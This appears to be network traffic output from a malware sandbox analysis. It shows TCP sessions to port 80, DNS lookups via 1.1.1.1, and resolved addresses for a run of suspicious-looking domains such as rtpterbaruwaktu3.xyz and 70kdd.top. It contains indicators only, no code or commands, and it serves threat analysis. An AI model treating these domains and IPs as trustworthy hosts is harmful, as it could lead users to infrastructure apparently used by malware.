                                                                                  Nov 27, 2024 01:27:26.225786924 CET8050005208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:26.225795031 CET8050005208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:26.225806952 CET8050005208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:26.225816011 CET8050005208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:26.225876093 CET5000580192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:26.225917101 CET5000580192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:26.231741905 CET5000580192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:26.351564884 CET8050005208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:32.608593941 CET5000680192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:32.728615046 CET80500068.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:32.728729010 CET5000680192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:32.919441938 CET5000680192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:33.039462090 CET80500068.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:34.335968018 CET80500068.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:34.336597919 CET80500068.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:34.336651087 CET5000680192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:34.425950050 CET5000680192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:35.548300982 CET5000780192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:35.668235064 CET80500078.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:35.668342113 CET5000780192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:35.835099936 CET5000780192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:35.955231905 CET80500078.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:37.283399105 CET80500078.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:37.283529997 CET80500078.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:37.283597946 CET5000780192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:37.348161936 CET5000780192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:38.378138065 CET5000880192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:38.498172998 CET80500088.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:38.498286009 CET5000880192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:38.603723049 CET5000880192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:38.723666906 CET80500088.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:38.723727942 CET80500088.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:40.074174881 CET80500088.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:40.074326038 CET80500088.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:40.074376106 CET5000880192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:40.113486052 CET5000880192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:41.132060051 CET5000980192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:41.252087116 CET80500098.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:41.254223108 CET5000980192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:41.280158043 CET5000980192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:41.400201082 CET80500098.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:42.933449030 CET80500098.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:42.933465958 CET80500098.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:42.933758020 CET5000980192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:42.936225891 CET5000980192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:43.056051016 CET80500098.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:48.573120117 CET5001080192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:48.726600885 CET80500103.33.130.190192.168.2.5
                                                                                  Nov 27, 2024 01:27:48.732378960 CET5001080192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:48.744182110 CET5001080192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:48.864229918 CET80500103.33.130.190192.168.2.5
                                                                                  Nov 27, 2024 01:27:49.831870079 CET80500103.33.130.190192.168.2.5
                                                                                  Nov 27, 2024 01:27:49.831934929 CET5001080192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:50.257385969 CET5001080192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:50.377370119 CET80500103.33.130.190192.168.2.5
                                                                                  Nov 27, 2024 01:27:51.274127960 CET5001180192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:51.394088984 CET80500113.33.130.190192.168.2.5
                                                                                  Nov 27, 2024 01:27:51.394171953 CET5001180192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:51.410229921 CET5001180192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:51.530179024 CET80500113.33.130.190192.168.2.5
                                                                                  Nov 27, 2024 01:27:52.584759951 CET80500113.33.130.190192.168.2.5
                                                                                  Nov 27, 2024 01:27:52.586153984 CET5001180192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:52.926134109 CET5001180192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:53.046232939 CET80500113.33.130.190192.168.2.5
                                                                                  Nov 27, 2024 01:27:53.946293116 CET5001280192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:54.066345930 CET80500123.33.130.190192.168.2.5
                                                                                  Nov 27, 2024 01:27:54.066570044 CET5001280192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:54.084717035 CET5001280192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:54.204745054 CET80500123.33.130.190192.168.2.5
                                                                                  Nov 27, 2024 01:27:54.204766989 CET80500123.33.130.190192.168.2.5
                                                                                  Nov 27, 2024 01:27:55.262402058 CET80500123.33.130.190192.168.2.5
                                                                                  Nov 27, 2024 01:27:55.266237974 CET5001280192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:55.598141909 CET5001280192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:55.718146086 CET80500123.33.130.190192.168.2.5
                                                                                  Nov 27, 2024 01:27:56.628268957 CET5001380192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:56.748286963 CET80500133.33.130.190192.168.2.5
                                                                                  Nov 27, 2024 01:27:56.750226974 CET5001380192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:56.759577990 CET5001380192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:56.879547119 CET80500133.33.130.190192.168.2.5
                                                                                  Nov 27, 2024 01:27:57.850389957 CET80500133.33.130.190192.168.2.5
                                                                                  Nov 27, 2024 01:27:57.850480080 CET80500133.33.130.190192.168.2.5
                                                                                  Nov 27, 2024 01:27:57.850542068 CET5001380192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:57.853877068 CET5001380192.168.2.53.33.130.190
                                                                                  Nov 27, 2024 01:27:57.974287033 CET80500133.33.130.190192.168.2.5
                                                                                  Nov 27, 2024 01:28:03.272409916 CET5001480192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:03.392369986 CET8050014209.74.77.109192.168.2.5
                                                                                  Nov 27, 2024 01:28:03.394280910 CET5001480192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:03.410196066 CET5001480192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:03.530278921 CET8050014209.74.77.109192.168.2.5
                                                                                  Nov 27, 2024 01:28:04.666182995 CET8050014209.74.77.109192.168.2.5
                                                                                  Nov 27, 2024 01:28:04.666240931 CET8050014209.74.77.109192.168.2.5
                                                                                  Nov 27, 2024 01:28:04.668514013 CET5001480192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:04.910453081 CET5001480192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:05.929183960 CET5001580192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:06.049086094 CET8050015209.74.77.109192.168.2.5
                                                                                  Nov 27, 2024 01:28:06.049180984 CET5001580192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:06.065623999 CET5001580192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:06.185566902 CET8050015209.74.77.109192.168.2.5
                                                                                  Nov 27, 2024 01:28:07.281994104 CET8050015209.74.77.109192.168.2.5
                                                                                  Nov 27, 2024 01:28:07.282088995 CET8050015209.74.77.109192.168.2.5
                                                                                  Nov 27, 2024 01:28:07.282242060 CET5001580192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:07.568255901 CET5001580192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:08.586822033 CET5001680192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:08.706897020 CET8050016209.74.77.109192.168.2.5
                                                                                  Nov 27, 2024 01:28:08.710417986 CET5001680192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:08.724385977 CET5001680192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:08.844435930 CET8050016209.74.77.109192.168.2.5
                                                                                  Nov 27, 2024 01:28:08.844446898 CET8050016209.74.77.109192.168.2.5
                                                                                  Nov 27, 2024 01:28:09.999281883 CET8050016209.74.77.109192.168.2.5
                                                                                  Nov 27, 2024 01:28:09.999439001 CET8050016209.74.77.109192.168.2.5
                                                                                  Nov 27, 2024 01:28:09.999491930 CET5001680192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:10.239387035 CET5001680192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:11.408588886 CET5001780192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:11.528597116 CET8050017209.74.77.109192.168.2.5
                                                                                  Nov 27, 2024 01:28:11.528712988 CET5001780192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:11.537964106 CET5001780192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:11.657876968 CET8050017209.74.77.109192.168.2.5
                                                                                  Nov 27, 2024 01:28:12.844492912 CET8050017209.74.77.109192.168.2.5
                                                                                  Nov 27, 2024 01:28:12.844743967 CET8050017209.74.77.109192.168.2.5
                                                                                  Nov 27, 2024 01:28:12.844924927 CET5001780192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:12.848411083 CET5001780192.168.2.5209.74.77.109
                                                                                  Nov 27, 2024 01:28:12.968319893 CET8050017209.74.77.109192.168.2.5
                                                                                  Nov 27, 2024 01:28:18.330570936 CET5001880192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:18.450491905 CET8050018161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:18.450583935 CET5001880192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:18.467114925 CET5001880192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:18.587095976 CET8050018161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:19.747399092 CET8050018161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:19.747461081 CET8050018161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:19.747471094 CET8050018161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:19.747564077 CET5001880192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:19.973597050 CET5001880192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:20.994267941 CET5001980192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:21.114322901 CET8050019161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:21.114658117 CET5001980192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:21.130261898 CET5001980192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:21.250314951 CET8050019161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:22.408601999 CET8050019161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:22.408643007 CET8050019161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:22.408696890 CET5001980192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:22.409506083 CET8050019161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:22.409555912 CET5001980192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:22.650888920 CET5001980192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:23.666261911 CET5002080192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:23.786236048 CET8050020161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:23.786308050 CET5002080192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:23.805068970 CET5002080192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:23.925215006 CET8050020161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:23.925229073 CET8050020161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:25.029800892 CET8050020161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:25.029814959 CET8050020161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:25.029824972 CET8050020161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:25.029988050 CET5002080192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:25.316703081 CET5002080192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:26.336628914 CET5002180192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:26.546698093 CET8050021161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:26.546780109 CET5002180192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:26.563488007 CET5002180192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:26.683403015 CET8050021161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:27.843817949 CET8050021161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:27.843839884 CET8050021161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:27.843853951 CET8050021161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:27.843952894 CET5002180192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:27.843985081 CET8050021161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:27.843996048 CET8050021161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:27.844031096 CET5002180192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:27.849194050 CET5002180192.168.2.5161.97.142.144
                                                                                  Nov 27, 2024 01:28:27.969147921 CET8050021161.97.142.144192.168.2.5
                                                                                  Nov 27, 2024 01:28:33.328607082 CET5002280192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:33.448579073 CET8050022185.27.134.206192.168.2.5
                                                                                  Nov 27, 2024 01:28:33.450390100 CET5002280192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:33.470304012 CET5002280192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:33.590266943 CET8050022185.27.134.206192.168.2.5
                                                                                  Nov 27, 2024 01:28:34.700767994 CET8050022185.27.134.206192.168.2.5
                                                                                  Nov 27, 2024 01:28:34.700838089 CET8050022185.27.134.206192.168.2.5
                                                                                  Nov 27, 2024 01:28:34.700891972 CET5002280192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:34.974301100 CET5002280192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:35.992120981 CET5002380192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:36.112302065 CET8050023185.27.134.206192.168.2.5
                                                                                  Nov 27, 2024 01:28:36.112390995 CET5002380192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:36.129889011 CET5002380192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:36.249922991 CET8050023185.27.134.206192.168.2.5
                                                                                  Nov 27, 2024 01:28:37.409043074 CET8050023185.27.134.206192.168.2.5
                                                                                  Nov 27, 2024 01:28:37.409734011 CET8050023185.27.134.206192.168.2.5
                                                                                  Nov 27, 2024 01:28:37.413492918 CET5002380192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:37.645143032 CET5002380192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:38.663378000 CET5002480192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:38.783373117 CET8050024185.27.134.206192.168.2.5
                                                                                  Nov 27, 2024 01:28:38.785689116 CET5002480192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:38.800612926 CET5002480192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:38.920726061 CET8050024185.27.134.206192.168.2.5
                                                                                  Nov 27, 2024 01:28:38.920737028 CET8050024185.27.134.206192.168.2.5
                                                                                  Nov 27, 2024 01:28:40.081840038 CET8050024185.27.134.206192.168.2.5
                                                                                  Nov 27, 2024 01:28:40.081886053 CET8050024185.27.134.206192.168.2.5
                                                                                  Nov 27, 2024 01:28:40.081939936 CET5002480192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:40.326817036 CET5002480192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:41.335598946 CET5002580192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:41.573168993 CET8050025185.27.134.206192.168.2.5
                                                                                  Nov 27, 2024 01:28:41.573283911 CET5002580192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:41.583425999 CET5002580192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:41.703391075 CET8050025185.27.134.206192.168.2.5
                                                                                  Nov 27, 2024 01:28:42.917366982 CET8050025185.27.134.206192.168.2.5
                                                                                  Nov 27, 2024 01:28:42.917450905 CET8050025185.27.134.206192.168.2.5
                                                                                  Nov 27, 2024 01:28:42.917613029 CET5002580192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:42.920485973 CET5002580192.168.2.5185.27.134.206
                                                                                  Nov 27, 2024 01:28:43.040411949 CET8050025185.27.134.206192.168.2.5
                                                                                  Nov 27, 2024 01:28:48.538163900 CET5002680192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:48.658260107 CET8050026172.67.138.37192.168.2.5
                                                                                  Nov 27, 2024 01:28:48.658339977 CET5002680192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:48.675177097 CET5002680192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:48.795021057 CET8050026172.67.138.37192.168.2.5
                                                                                  Nov 27, 2024 01:28:49.997076035 CET8050026172.67.138.37192.168.2.5
                                                                                  Nov 27, 2024 01:28:49.997091055 CET8050026172.67.138.37192.168.2.5
                                                                                  Nov 27, 2024 01:28:49.997137070 CET5002680192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:49.998460054 CET8050026172.67.138.37192.168.2.5
                                                                                  Nov 27, 2024 01:28:49.998509884 CET5002680192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:50.176199913 CET5002680192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:51.195163012 CET5002780192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:51.315114021 CET8050027172.67.138.37192.168.2.5
                                                                                  Nov 27, 2024 01:28:51.315337896 CET5002780192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:51.330374002 CET5002780192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:51.450328112 CET8050027172.67.138.37192.168.2.5
                                                                                  Nov 27, 2024 01:28:52.738586903 CET8050027172.67.138.37192.168.2.5
                                                                                  Nov 27, 2024 01:28:52.738718987 CET8050027172.67.138.37192.168.2.5
                                                                                  Nov 27, 2024 01:28:52.738774061 CET5002780192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:52.738910913 CET8050027172.67.138.37192.168.2.5
                                                                                  Nov 27, 2024 01:28:52.738955975 CET5002780192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:52.996906996 CET5002780192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:54.008150101 CET5002880192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:54.128146887 CET8050028172.67.138.37192.168.2.5
                                                                                  Nov 27, 2024 01:28:54.130424023 CET5002880192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:54.143984079 CET5002880192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:54.264051914 CET8050028172.67.138.37192.168.2.5
                                                                                  Nov 27, 2024 01:28:54.264065981 CET8050028172.67.138.37192.168.2.5
                                                                                  Nov 27, 2024 01:28:55.474082947 CET8050028172.67.138.37192.168.2.5
                                                                                  Nov 27, 2024 01:28:55.474214077 CET8050028172.67.138.37192.168.2.5
                                                                                  Nov 27, 2024 01:28:55.474334002 CET5002880192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:55.475208998 CET8050028172.67.138.37192.168.2.5
                                                                                  Nov 27, 2024 01:28:55.475318909 CET8050028172.67.138.37192.168.2.5
                                                                                  Nov 27, 2024 01:28:55.476494074 CET5002880192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:56.019937038 CET5002880192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:57.040424109 CET5002980192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:57.160360098 CET8050029172.67.138.37192.168.2.5
                                                                                  Nov 27, 2024 01:28:57.160789967 CET5002980192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:57.172549009 CET5002980192.168.2.5172.67.138.37
                                                                                  Nov 27, 2024 01:28:57.292500019 CET8050029172.67.138.37192.168.2.5

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 27, 2024 01:25:20.344255924 CET6395453192.168.2.51.1.1.1
                                                                                  Nov 27, 2024 01:25:20.932641029 CET53639541.1.1.1192.168.2.5
                                                                                  Nov 27, 2024 01:25:37.757805109 CET5079153192.168.2.51.1.1.1
                                                                                  Nov 27, 2024 01:25:38.476607084 CET53507911.1.1.1192.168.2.5
                                                                                  Nov 27, 2024 01:25:53.335391045 CET5297153192.168.2.51.1.1.1
                                                                                  Nov 27, 2024 01:25:53.780529976 CET53529711.1.1.1192.168.2.5
                                                                                  Nov 27, 2024 01:26:08.047642946 CET6028453192.168.2.51.1.1.1
                                                                                  Nov 27, 2024 01:26:09.050718069 CET6028453192.168.2.51.1.1.1
                                                                                  Nov 27, 2024 01:26:09.251950026 CET53602841.1.1.1192.168.2.5
                                                                                  Nov 27, 2024 01:26:09.252188921 CET53602841.1.1.1192.168.2.5
                                                                                  Nov 27, 2024 01:26:23.695508957 CET6506153192.168.2.51.1.1.1
                                                                                  Nov 27, 2024 01:26:24.460850000 CET53650611.1.1.1192.168.2.5
                                                                                  Nov 27, 2024 01:26:59.593133926 CET5562953192.168.2.51.1.1.1
                                                                                  Nov 27, 2024 01:27:00.585922956 CET5562953192.168.2.51.1.1.1
                                                                                  Nov 27, 2024 01:27:00.700567961 CET53556291.1.1.1192.168.2.5
                                                                                  Nov 27, 2024 01:27:00.723803043 CET53556291.1.1.1192.168.2.5
                                                                                  Nov 27, 2024 01:27:15.946263075 CET6349553192.168.2.51.1.1.1
                                                                                  Nov 27, 2024 01:27:16.642343044 CET53634951.1.1.1192.168.2.5
                                                                                  Nov 27, 2024 01:27:31.244119883 CET5191453192.168.2.51.1.1.1
                                                                                  Nov 27, 2024 01:27:32.254216909 CET5191453192.168.2.51.1.1.1
                                                                                  Nov 27, 2024 01:27:32.572633982 CET53519141.1.1.1192.168.2.5
                                                                                  Nov 27, 2024 01:27:32.572643042 CET53519141.1.1.1192.168.2.5
                                                                                  Nov 27, 2024 01:27:47.945741892 CET6168453192.168.2.51.1.1.1
                                                                                  Nov 27, 2024 01:27:48.570683002 CET53616841.1.1.1192.168.2.5
                                                                                  Nov 27, 2024 01:28:02.867779970 CET5813553192.168.2.51.1.1.1
                                                                                  Nov 27, 2024 01:28:03.267591953 CET53581351.1.1.1192.168.2.5
                                                                                  Nov 27, 2024 01:28:17.853146076 CET4953553192.168.2.51.1.1.1
                                                                                  Nov 27, 2024 01:28:18.328298092 CET53495351.1.1.1192.168.2.5
                                                                                  Nov 27, 2024 01:28:32.867032051 CET5395953192.168.2.51.1.1.1
                                                                                  Nov 27, 2024 01:28:33.324302912 CET53539591.1.1.1192.168.2.5
                                                                                  Nov 27, 2024 01:28:47.931484938 CET5948653192.168.2.51.1.1.1
                                                                                  Nov 27, 2024 01:28:48.535721064 CET53594861.1.1.1192.168.2.5

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Nov 27, 2024 01:25:20.344255924 CET192.168.2.51.1.1.10x7302Standard query (0)www.rtpterbaruwaktu3.xyzA (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:25:37.757805109 CET192.168.2.51.1.1.10x45f0Standard query (0)www.70kdd.topA (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:25:53.335391045 CET192.168.2.51.1.1.10xc42Standard query (0)www.acond-22-mvr.clickA (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:26:08.047642946 CET192.168.2.51.1.1.10xe71dStandard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:26:09.050718069 CET192.168.2.51.1.1.10xe71dStandard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:26:23.695508957 CET192.168.2.51.1.1.10x64cbStandard query (0)www.mrpokrovskii.proA (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:26:59.593133926 CET192.168.2.51.1.1.10x3e35Standard query (0)www.ytsd88.topA (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:27:00.585922956 CET192.168.2.51.1.1.10x3e35Standard query (0)www.ytsd88.topA (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:27:15.946263075 CET192.168.2.51.1.1.10x681eStandard query (0)www.matteicapital.onlineA (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:27:31.244119883 CET192.168.2.51.1.1.10x7887Standard query (0)www.llljjjiii.shopA (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:27:32.254216909 CET192.168.2.51.1.1.10x7887Standard query (0)www.llljjjiii.shopA (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:27:47.945741892 CET192.168.2.51.1.1.10xbd4cStandard query (0)www.ampsamkok88.shopA (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:28:02.867779970 CET192.168.2.51.1.1.10x74ceStandard query (0)www.gogawithme.liveA (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:28:17.853146076 CET192.168.2.51.1.1.10xd201Standard query (0)www.54248711.xyzA (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:28:32.867032051 CET192.168.2.51.1.1.10x62d3Standard query (0)www.canadavinreport.siteA (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:28:47.931484938 CET192.168.2.51.1.1.10x4886Standard query (0)www.questmatch.proA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Nov 27, 2024 01:25:20.932641029 CET1.1.1.1192.168.2.50x7302No error (0)www.rtpterbaruwaktu3.xyzrtpterbaruwaktu3.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 27, 2024 01:25:20.932641029 CET1.1.1.1192.168.2.50x7302No error (0)rtpterbaruwaktu3.xyz103.21.221.87A (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:25:38.476607084 CET1.1.1.1192.168.2.50x45f0No error (0)www.70kdd.top70kdd.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 27, 2024 01:25:38.476607084 CET1.1.1.1192.168.2.50x45f0No error (0)70kdd.top38.47.232.124A (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:25:53.780529976 CET1.1.1.1192.168.2.50xc42No error (0)www.acond-22-mvr.click199.59.243.227A (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:26:09.251950026 CET1.1.1.1192.168.2.50xe71dNo error (0)www.smartcongress.netsmartcongress.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 27, 2024 01:26:09.251950026 CET1.1.1.1192.168.2.50xe71dNo error (0)smartcongress.net146.88.233.115A (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:26:09.252188921 CET1.1.1.1192.168.2.50xe71dNo error (0)www.smartcongress.netsmartcongress.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 27, 2024 01:26:09.252188921 CET1.1.1.1192.168.2.50xe71dNo error (0)smartcongress.net146.88.233.115A (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:26:24.460850000 CET1.1.1.1192.168.2.50x64cbNo error (0)www.mrpokrovskii.pro109.70.26.37A (IP address)IN (0x0001)false
